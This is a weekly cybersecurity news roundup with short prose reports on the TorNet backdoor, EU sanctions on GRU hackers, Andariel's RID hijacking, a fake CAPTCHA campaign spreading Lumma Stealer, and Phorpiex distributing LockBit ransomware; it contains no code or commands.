Weekly Summary Cyber attacks January 23rd-29th

TorNet, a new malware targeting users in Central Europe, discovered   

Cybersecurity researchers have identified an ongoing cyberattack campaign since July 2024, mainly targeting users in Poland and Germany via phishing emails. The attacking group uses messages disguised as bank transfer confirmations and fake receipts to trick victims, who upon opening the zipped attachments activate a malware called PureCrypter. This, in turn, installs a novel backdoor called “TorNet”. This backdoor employs advanced techniques to evade detection, such as briefly disconnecting the machine from the network before installing itself and communicating with command-and-control servers via the TOR network, making it difficult to track. The malware establishes persistence through scheduled tasks and manipulates security settings in Windows to ensure its activity even in low-power conditions. The backdoor can execute commands and load additional code into system memory, increasing the potential for intrusion. It also includes tools to circumvent scanning and virtualization environments, enhancing its camouflage capabilities.  

EU sanctions Russian GRU hackers for cyberattacks against Estonia  

 The European Union has imposed sanctions on three hackers from the GRU, Russia's military intelligence, for their involvement in cyberattacks against Estonian government agencies in 2020. Officers Nikolay Korchagin, Vitaly Shevchenko and Yuriy Denisov, members of Unit 29155, gained unauthorized access to sensitive data, stealing thousands of classified documents from ministries such as Economic Affairs, Social Affairs and Foreign Affairs. The attacks compromised trade secrets, medical records and critical information, putting the security of the affected institutions at risk. This GRU unit has also executed cyber-attacks against other EU countries, NATO allies and nations in Latin America, Europe and Central Asia. Since 2022, the group has focused its efforts on sabotaging organizations that support Ukraine. The U.S. and its allies have linked the GRU to cyberattacks on critical infrastructure globally and have offered a reward of up to $10 million for information on several of its members.  

North Korean hackers use RID hijacking technique to hide accounts with administrator access   

A hacker group linked to North Korea, known as Andariel, has employed a technique called RID hijacking to grant administrator permissions to low-privilege accounts on Windows systems without being detected. This method modifies the relative identifier (RID) of an account, causing the system to treat it as having a higher level of access. The attack requires prior access to the system and SAM records, achieved by using tools such as PsExec and JuicyPotato to execute commands at the SYSTEM level. Although this level of access is high, the hackers created hidden accounts with basic privileges, increased their permissions through RID hijacking and added them to groups such as Administrators and Remote Desktop Users for greater persistence and discretion. Researchers note that Andariel uses custom malware and open-source tools to perform these modifications. They also implement techniques to hide their activity, removing traces of the altered accounts and ensuring their reactivation without appearing in logs. To prevent these attacks, administrators should protect SAM logs, restrict tools such as PsExec, and apply multifactor authentication on all accounts, even those of lower privilege. The RID hijacking technique has been known since 2018 and remains a persistent threat in Windows environments.  

Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks   

Cybersecurity researchers have warned of a new malware campaign that uses fake CAPTCHA checks to distribute the notorious Lumma information stealer. The campaign is global, with victims in countries such as Argentina, Colombia, the United States and the Philippines, and spans multiple industries, including healthcare, banking and marketing, with the telecommunications sector being the most affected. The attack begins when a victim visits a compromised website that redirects them to a fake CAPTCHA page, specifically instructing them to copy and paste a command into the Windows run box, using the mshta.exe binary to download and execute an HTA file from a remote server. This HTA file executes a PowerShell command that launches a subsequent payload, a PowerShell script that unpacks another PowerShell script responsible for decoding and loading the Lumma payload.  

Phorpiex: the botnet distributing LockBit ransomware   

The Phorpiex botnet, active since 2010, has recently been identified as being used to distribute the latest version of the LockBit Black ransomware (LockBit 3.0). Unlike previous attacks, this variant spreads in an automated fashion without direct human intervention. Since the Phorpiex source code was sold in 2021, its structure has changed little, maintaining techniques such as Zone.Identifier file deletion to hide traces. LockBit Black, known for its encryption speed and double extortion, is now distributed directly via Phorpiex without spreading throughout the target's network, a strategic shift. The attack is initiated with phishing emails containing malicious attachments, triggering a downloader that installs the ransomware. In addition, the Phorpiex infrastructure could be being offered as a service to other cybercriminals. Despite international efforts to dismantle LockBit, the group remains active, posing a significant threat to multiple industries.